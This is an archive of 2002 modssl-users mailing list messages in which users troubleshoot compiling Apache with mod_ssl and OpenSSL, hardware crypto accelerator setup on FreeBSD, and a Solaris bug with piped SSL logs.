	from relais.videotron.ca id GAA22708; Tue, 9 Jul 2002 06:23:53 +0200 (MET DST)
Received: from toilet ([66.130.22.64]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD3) with ESMTP
          id GYYS7Q01.QZE for ; Tue, 9 Jul 2002
          00:23:50 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17RmXV-0000Nj-00; Tue, 09 Jul 2002 00:23:49 -0400
Date: Tue, 9 Jul 2002 00:23:49 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: RE: apache_1.3.26
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 8 Jul 2002, New Disorder Records wrote:

> well, that's a lot more than I needed.  I think the key is somewhere in
> the
>
> SSL_BASE=SYSTEM thing.
>
> I have openssl installed, this is redhat, but when I set SSL_BASE=SYSTEM,
> I still get the error:
>
> Error: Cannot find SSL binaries under /usr/local/ssl
>
> when I run configure in apache.  I don't know what binaries it's looking
> for, but there is a bin directory under /usr/local/ssl.

If there's no include or lib[s] sub-directories then you're probably
missing the openssl***-dev rpm. Try installing that too, I think the error
message may mean "SSL libraries" when it says "SSL binaries". You probably
don't need the openssl***-src rpm though.

Otherwise if that's not the problem, I know that there's at least one
Redhat officianado lurking around on this mail list ... :-)

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 07:09:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA26907; Tue, 9 Jul 2002 07:08:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id HAA26842; Tue, 9 Jul 2002 07:07:45 +0200 (MET DST)
Received: from shodan2 ([24.200.91.45]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD3) with ESMTP
          id GYYJSE03.2NJ for ; Mon, 8 Jul 2002
          21:21:50 -0400 
From: "Enrico Demarin" 
To: 
Subject: RE: SSL only Authentication Cient
Date: Mon, 8 Jul 2002 21:24:27 -0700
Message-ID: <001e01c22700$83902360$0340a8c0@shodan2>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
In-Reply-To: <3D241602.E9303552@glauco.it>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Enrico Demarin" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I think hotmail works like that, the authentication is done through
https and then it reverts to regular http.

So yes I think it's possible.

Enrico

> -----Original Message-----
> From: owner-modssl-users@modssl.org 
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Daniela Prestipino
> Sent: July 4, 2002 2:32 AM
> To: modssl-users@modssl.org
> Subject: SSL only Authentication Cient
> 
> 
> Hi,
> Is it possible to config SSL protocol with only client 
> authentication, without encrypting the transmitted data, 
> using Apache 1.3.19 with mod_ssl 2.8.1 and openssl 0.9.5a? 
> Thanks Daniela
> 
> --
>     Daniela Prestipino
>     d.prestipino@glauco.it
> 
>     I.D.S.,
>     Informatica Distribuita e Software srl
>     Via Consolare Pompea 19
>     98168 Messina ITALIA
>     Tel.: +39 90 353638
>     Fax : +39 90 3500063
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 07:17:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA27732; Tue, 9 Jul 2002 07:16:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from statler.squaretrade.com id HAA27462; Tue, 9 Jul 2002 07:14:11 +0200 (MET DST)
Received: from glen by statler.squaretrade.com with local (Exim 3.35 #1 (Debian))
	id 17RnJh-0002xO-00
	for ; Mon, 08 Jul 2002 22:13:37 -0700
Date: Mon, 8 Jul 2002 22:13:37 -0700
To: modssl-users@modssl.org
Subject: Re: apache_1.3.26
Message-ID: <20020709051337.GB13365@squaretrade.com>
References: <000401c226ae$307df000$0100000a@jesip> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
From: Glen Mehn 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glen Mehn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

try adding /usr/local/ssl/lib to your 	LD_LIBRARY_PATH

this is an educted guess, though... good luck.

-g

On Mon, Jul 08, 2002 at 11:40:37AM -0700, New Disorder Records wrote:
> well, that's a lot more than I needed.  I think the key is somewhere in 
> the 
> 
> SSL_BASE=SYSTEM thing.
> 
> I have openssl installed, this is redhat, but when I set SSL_BASE=SYSTEM, 
> I still get the error:
> 
> Error: Cannot find SSL binaries under /usr/local/ssl
> 
> when I run configure in apache.  I don't know what binaries it's looking 
> for, but there is a bin directory under /usr/local/ssl.
> 
> -Ernst
> 
> On Mon, 8 Jul 2002, [iso-8859-2] Jan ?kola wrote:
> 
> > Yes, use this script to compile Apache & mod_ssl & mod_perl & php. If
> > you dont want it all comment it. I use this with complete success on RH
> > 7.2, after unzip, config and make go to apache* dir and run make install
> > 
> > Jan Skola
> > 
> > > -----Original Message-----
> > > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]
> > > On Behalf Of New Disorder Records
> > > Sent: Monday, July 08, 2002 5:13 PM
> > > To: modssl-users@modssl.org
> > > Subject: apache_1.3.26
> > > 
> > > is anyone else having problems compiling apache_1.3.26 with mod_ssl?
> > I'm
> > > on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the
> > apache
> > > directory.  Not erases, but all that's created is a blank header.
> > After I
> > > try, I have to wipe the directory and untar apache again so that I can
> > > compile it without mod_ssl.  Any suggestions?
> > > 
> > > 
> > > 
> > > --
> > > New Disorder Records "you've heard of us now, so shut up and buy the
> > damn
> > > Sacrilicious CD" - www.newdisorder.com
> > > Pirx the Pilot: One of the top three Structuralist punk rock bands in
> > the
> > > country.  www.pirxthepilot.com
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > > 
> > 
> > 
> 
> -- 
> New Disorder Records "you've heard of us now, so shut up and buy the damn 
> Sacrilicious CD" - www.newdisorder.com
> Pirx the Pilot: One of the top three Structuralist punk rock bands in the 
> country.  www.pirxthepilot.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Glen S Mehn
Contract Systems Administrator		SquareTrade, Inc
glen@squaretrade.com	Building Trust in Transactions (sm)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 16:09:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA25747; Tue, 9 Jul 2002 16:08:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA25627; Tue, 9 Jul 2002 16:08:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 145494CE73C; Tue,  9 Jul 2002 15:06:10 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 926FA28830; Tue,  9 Jul 2002 07:08:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxrelay.ptc.com id WAA24837; Mon, 8 Jul 2002 22:05:18 +0200 (MET DST)
Received: from HQ-EXFE2.ptcnet.ptc.com (localhost [127.0.0.1])
	by mxrelay.ptc.com (8.9.0/8.9.0) with ESMTP id QAA25564
	for ; Mon, 8 Jul 2002 16:05:12 -0400 (EDT)
Received: from JNHARRILL03L ([132.253.238.69]) by HQ-EXFE2.ptcnet.ptc.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Mon, 8 Jul 2002 16:04:31 -0400
From: "John N. Harrill" 
To: 
Subject: Trouble Building on Win32
Date: Mon, 8 Jul 2002 16:10:20 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0074_01C22699.F55C3DB0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
X-OriginalArrivalTime: 08 Jul 2002 20:04:32.0329 (UTC) FILETIME=[ACB7BB90:01C226BA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John N. Harrill" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0074_01C22699.F55C3DB0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Was there every a resolution to the issue on Building Apache 1.3.26 with
mod_ssl 2.8.10 for Windows 2000 platform.  I am running into the same issue.
This issue was originally submitted by Noah White. (see link below)

Thanks in advance for any assistance on this matter.

John Harrill

http://www.mail-archive.com/modssl-users@modssl.org/msg14425.html

------=_NextPart_000_0074_01C22699.F55C3DB0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable



















Was there every a resolution to the issue on Building Apache =
1.3.26 with
mod_ssl 2.8.10 for Windows 2000 platform. 
I am running into the same =
issue.



This issue was originally submitted by Noah White. (see link =
below)



 



Thanks in advance for any assistance on this =
matter.



 



John Harrill



 



http://www.mail-archive.com/modssl-users@modssl.org/msg14425.html









------=_NextPart_000_0074_01C22699.F55C3DB0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul  9 16:10:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA26053; Tue, 9 Jul 2002 16:09:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA25630; Tue, 9 Jul 2002 16:08:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F278D4CE715; Tue,  9 Jul 2002 15:06:09 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EB66E285E0; Tue,  9 Jul 2002 07:08:48 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA22383; Mon, 8 Jul 2002 21:39:05 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 8 Jul 2002 12:38:57 -0700
Received: from 204.170.23.235 by sea2fd.sea2.hotmail.msn.com with HTTP;
	Mon, 08 Jul 2002 19:38:56 GMT
X-Originating-IP: [204.170.23.235]
From: "Robert McMonigal" 
To: modssl-users@modssl.org
Subject: freebsd SSLCryptoDevice
Date: Mon, 08 Jul 2002 19:38:56 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 08 Jul 2002 19:38:57.0080 (UTC) FILETIME=[19A35380:01C226B7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robert McMonigal" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have been trying to get an aep hardware acclerator to work under apache 
2.0.39.  Everything installs fine and it runs fine with SSLCryptoDevice 
builtin.  But if I change builtin to aep and try to start it, it appears to 
start mormally (no error messages from the console) but in the error log I 
get "Init: Failed to enable Crypto Device API `aep'" I know the card is 
working because I can do openssl speed rsa1024 -engine aep and the CPU time 
is less then a second for ten seconds of computations.  I have tried this on 
redhat 7.3 and it works.  So I was wondering if apache 2 compiles 
differently on freebsd then redhat.  Any ideas on what is going wrong would 
be greatly appreciated.


I run the following command for the configure

CFLAGS="-DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure 
--prefix=/usr/local/httpd --enable-ssl 
--with-ssl=/usr/local/src/openssl-engine-0.9.6d

Thanks,

Rob

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 06:50:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA13661; Wed, 10 Jul 2002 06:49:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id GAA13645; Wed, 10 Jul 2002 06:48:44 +0200 (MET DST)
Received: from toilet ([66.130.22.64]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD2) with ESMTP
          id GYZOMR01.TKB for ; Tue, 9 Jul 2002
          12:04:03 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17RxT9-0000GY-00; Tue, 09 Jul 2002 12:04:03 -0400
Date: Tue, 9 Jul 2002 12:04:03 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: freebsd SSLCryptoDevice
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 8 Jul 2002, Robert McMonigal wrote:

> I have been trying to get an aep hardware acclerator to work under apache
> 2.0.39.  Everything installs fine and it runs fine with SSLCryptoDevice
> builtin.  But if I change builtin to aep and try to start it, it appears to
> start mormally (no error messages from the console) but in the error log I
> get "Init: Failed to enable Crypto Device API `aep'" I know the card is
> working because I can do openssl speed rsa1024 -engine aep and the CPU time
> is less then a second for ten seconds of computations.  I have tried this on
> redhat 7.3 and it works.  So I was wondering if apache 2 compiles
> differently on freebsd then redhat.  Any ideas on what is going wrong would
> be greatly appreciated.
>
>
> I run the following command for the configure
>
> CFLAGS="-DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure
> --prefix=/usr/local/httpd --enable-ssl
> --with-ssl=/usr/local/src/openssl-engine-0.9.6d

Can you ensure you've got a decent debugging level set (eg. perhaps
"SSLLogLevel info") and post the last few lines of the error log when
starting up apache? That should include the openssl-generated error stack
which will go some way further to saying how/why the initialisation
failed. I'd suspect it's a failure to load the AEP-specific shared-library
(ie. a path issue) but without more info it's difficult to tell.

BTW: I assume you've verified that when you say "openssl speed rsa1024
-engine aep" is working, that you're talking about the copy of the
'openssl' binary in /usr/local/src/openssl-engine-0.9.6d and *not* the
'openssl' binary installed in a system $PATH as part of the freebsd
distribution? If not, you're comparing success with one (packaged,
installed, and quite possibly modified) build of openssl with failure of
an entirely different build of openssl.

Cheers,
Geoff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 07:54:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA15941; Wed, 10 Jul 2002 07:53:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id HAA15919; Wed, 10 Jul 2002 07:52:12 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6A5mF3X001476
	for ; Wed, 10 Jul 2002 01:48:15 -0400
Date: Wed, 10 Jul 2002 01:48:15 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: freebsd SSLCryptoDevice
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 9 Jul 2002, Geoff Thorpe wrote:

> Can you ensure you've got a decent debugging level set (eg. perhaps
> "SSLLogLevel info") and post the last few lines of the error log when

Note that there's no such thing as a separate SSLLog/SSLLogLevel in Apache
2.0 anymore -- it's all lumped in with the regular error_log.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:03:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19178; Wed, 10 Jul 2002 09:02:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id JAA19120; Wed, 10 Jul 2002 09:01:53 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 23A43BD2E; Wed, 10 Jul 2002 09:02:16 +0200 (CEST)
Date: Wed, 10 Jul 2002 09:02:16 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: freebsd SSLCryptoDevice
Message-ID: <20020710070216.GA29386@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jul 10, 2002 at 01:48:15AM -0400, Cliff Woolley wrote:
> Note that there's no such thing as a separate SSLLog/SSLLogLevel in Apache
> 2.0 anymore -- it's all lumped in with the regular error_log.
> 

Which is a really bad move IMHO - debugging with mod_ssl was very good, and
easy to use, but now with 2.0 it has been hacked into something much less
usable. Making the loglevel tie in with the general loglevel, you get debugging
info from two places at once, that it _very_ rarely makes sense to debug 
together. For those of us who actually use the SSLLog as proof that every 
transaction did in fact have the right levels of crypto etc, this is a real
PITA change. But I suppose that is what happens when someone decides to apr'ize
stuff they don't really know a whole lot about.


vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:09:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19758; Wed, 10 Jul 2002 09:08:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA19548; Wed, 10 Jul 2002 09:07:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BFD874CE749; Wed, 10 Jul 2002 09:07:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D373C286FB; Wed, 10 Jul 2002 08:48:22 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id LAA21175; Tue, 9 Jul 2002 11:04:05 +0200 (MET DST)
Date: Tue, 9 Jul 2002 11:04:05 +0200 (MET DST)
Message-Id: <200207090904.LAA21175@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] SSLLog into pipe on Solaris hangs when restarted (PR#732)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Ralph Mengen
Version: 2.8.10-1.3.26
OS: SunOS 5.8
Submission from: (NULL) (129.26.9.7)


Hi.

I pipe the SSLLog (and apache's ErrorLog also) into a command like
SSLLog "|/mylogger"
ErrorLog "|/mylogger"

When I now sent a SIGHUP to the apache server for restarting it
will hang. This is a known bug in apache since a very long time
(http://bugs.apache.org/index.cgi/full/6476). There is a workaround
for ErrorLog (and CustomLog):
ErrorLog "|exec /mylogger"

But this workaround doesn't work for SSLLog. When trying
SSLLog "|exec /mylogger" I will receive following error in my
errlog:
/bin/sh: /opt/apache/exec: not found

Any ideas why this doesn't work in SSL, too?

MANY thanx in advance,
   ++ralph

P.S.: BTW: The whole discussion about this stupid apache bug is in
http://groups.google.de/groups?q=pipe+apache+solaris+exec&hl=de&lr=&ie=UTF-8&selm=YFtC6.7352%24122.1975033%40news1.rdc1.md.home.com&rnum=2
http://groups.google.de/groups?hl=de&lr=&ie=UTF-8&threadm=YFtC6.7352%24122.1975033%40news1.rdc1.md.home.com&rnum=2&prev=/groups%3Fq%3Dpipe%2Bapache%2Bsolaris%2Bexec%26hl%3Dde%26lr%3D%26ie%3DUTF-8%26selm%3DYFtC6.7352%2524122.1975033%2540news1.rdc1.md.home.com%26rnum%3D2
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:09:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19835; Wed, 10 Jul 2002 09:08:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA19540; Wed, 10 Jul 2002 09:07:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 769834CE73C; Wed, 10 Jul 2002 09:07:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 6CB7628831; Wed, 10 Jul 2002 08:48:05 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.hblindustries.com id IAA03768; Tue, 9 Jul 2002 08:14:42 +0200 (MET DST)
Received: from www.hblindustries.com (www.hblindustries.com [64.84.19.47])
	by www.hblindustries.com (8.11.6/8.11.2) with ESMTP id g696BTg25776
	for ; Mon, 8 Jul 2002 23:11:29 -0700
Date: Mon, 8 Jul 2002 23:11:29 -0700 (PDT)
From: New Disorder Records 
X-X-Sender:  
To: 
Subject: Re: apache_1.3.26
In-Reply-To: <20020709051337.GB13365@squaretrade.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: New Disorder Records 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I found the answer, it's SSL_BASE=SYSTEM.

Thanks.

On Mon, 8 Jul 2002, Glen Mehn wrote:

> try adding /usr/local/ssl/lib to your 	LD_LIBRARY_PATH
> 
> this is an educted guess, though... good luck.
> 
> -g
> 
> On Mon, Jul 08, 2002 at 11:40:37AM -0700, New Disorder Records wrote:
> > well, that's a lot more than I needed.  I think the key is somewhere in 
> > the 
> > 
> > SSL_BASE=SYSTEM thing.
> > 
> > I have openssl installed, this is redhat, but when I set SSL_BASE=SYSTEM, 
> > I still get the error:
> > 
> > Error: Cannot find SSL binaries under /usr/local/ssl
> > 
> > when I run configure in apache.  I don't know what binaries it's looking 
> > for, but there is a bin directory under /usr/local/ssl.
> > 
> > -Ernst
> > 
> > On Mon, 8 Jul 2002, [iso-8859-2] Jan ?kola wrote:
> > 
> > > Yes, use this script to compile Apache & mod_ssl & mod_perl & php. If
> > > you dont want it all comment it. I use this with complete success on RH
> > > 7.2, after unzip, config and make go to apache* dir and run make install
> > > 
> > > Jan Skola
> > > 
> > > > -----Original Message-----
> > > > From: owner-modssl-users@modssl.org
> > > [mailto:owner-modssl-users@modssl.org]
> > > > On Behalf Of New Disorder Records
> > > > Sent: Monday, July 08, 2002 5:13 PM
> > > > To: modssl-users@modssl.org
> > > > Subject: apache_1.3.26
> > > > 
> > > > is anyone else having problems compiling apache_1.3.26 with mod_ssl?
> > > I'm
> > > > on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the
> > > apache
> > > > directory.  Not erases, but all that's created is a blank header.
> > > After I
> > > > try, I have to wipe the directory and untar apache again so that I can
> > > > compile it without mod_ssl.  Any suggestions?
> > > > 
> > > > 
> > > > 
> > > > --
> > > > New Disorder Records "you've heard of us now, so shut up and buy the
> > > damn
> > > > Sacrilicious CD" - www.newdisorder.com
> > > > Pirx the Pilot: One of the top three Structuralist punk rock bands in
> > > the
> > > > country.  www.pirxthepilot.com
> > > > ______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > > User Support Mailing List                      modssl-users@modssl.org
> > > > Automated List Manager                            majordomo@modssl.org
> > > > 
> > > 
> > > 
> > 
> > -- 
> > New Disorder Records "you've heard of us now, so shut up and buy the damn 
> > Sacrilicious CD" - www.newdisorder.com
> > Pirx the Pilot: One of the top three Structuralist punk rock bands in the 
> > country.  www.pirxthepilot.com
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
New Disorder Records "you've heard of us now, so shut up and buy the damn 
Sacrilicious CD" - www.newdisorder.com
Pirx the Pilot: One of the top three Structuralist punk rock bands in the 
country.  www.pirxthepilot.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:09:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19860; Wed, 10 Jul 2002 09:08:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA19556; Wed, 10 Jul 2002 09:07:10 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2042A4CE75F; Wed, 10 Jul 2002 09:07:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E2C6D286B4; Wed, 10 Jul 2002 08:49:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mta201-rme.xtra.co.nz id GAA13519; Wed, 10 Jul 2002 06:43:59 +0200 (MET DST)
Received: from mta2-rme.xtra.co.nz ([210.86.15.142])
          by mta201-rme.xtra.co.nz with ESMTP
          id <20020710044346.BIVY6924.mta201-rme.xtra.co.nz@mta2-rme.xtra.co.nz>
          for ; Wed, 10 Jul 2002 16:43:46 +1200
Received: from snoopy ([210.86.100.225]) by mta2-rme.xtra.co.nz with SMTP
          id <20020710044345.OZZ27040.mta2-rme.xtra.co.nz@snoopy>
          for ; Wed, 10 Jul 2002 16:43:45 +1200
From: "Pj Pilley" 
To: 
Subject: RE: apache_1.3.26
Date: Wed, 10 Jul 2002 17:01:32 +1200
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <20020709051337.GB13365@squaretrade.com>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pj Pilley" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I agree with Greg check you ld path it should be in your /etc directory
check that it is in there and then run ldconfig to refresh the list and load
the new libraries.

--Pj


>try adding /usr/local/ssl/lib to your 	LD_LIBRARY_PATH

>this is an educted guess, though... good luck.

>-g

On Mon, Jul 08, 2002 at 11:40:37AM -0700, New Disorder Records wrote:
> well, that's a lot more than I needed.  I think the key is somewhere in
> the
>
